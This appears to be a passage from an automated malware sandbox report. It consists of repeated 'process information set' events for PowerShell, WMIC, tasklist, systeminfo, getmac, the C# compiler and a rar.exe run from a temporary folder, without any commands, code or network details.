              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
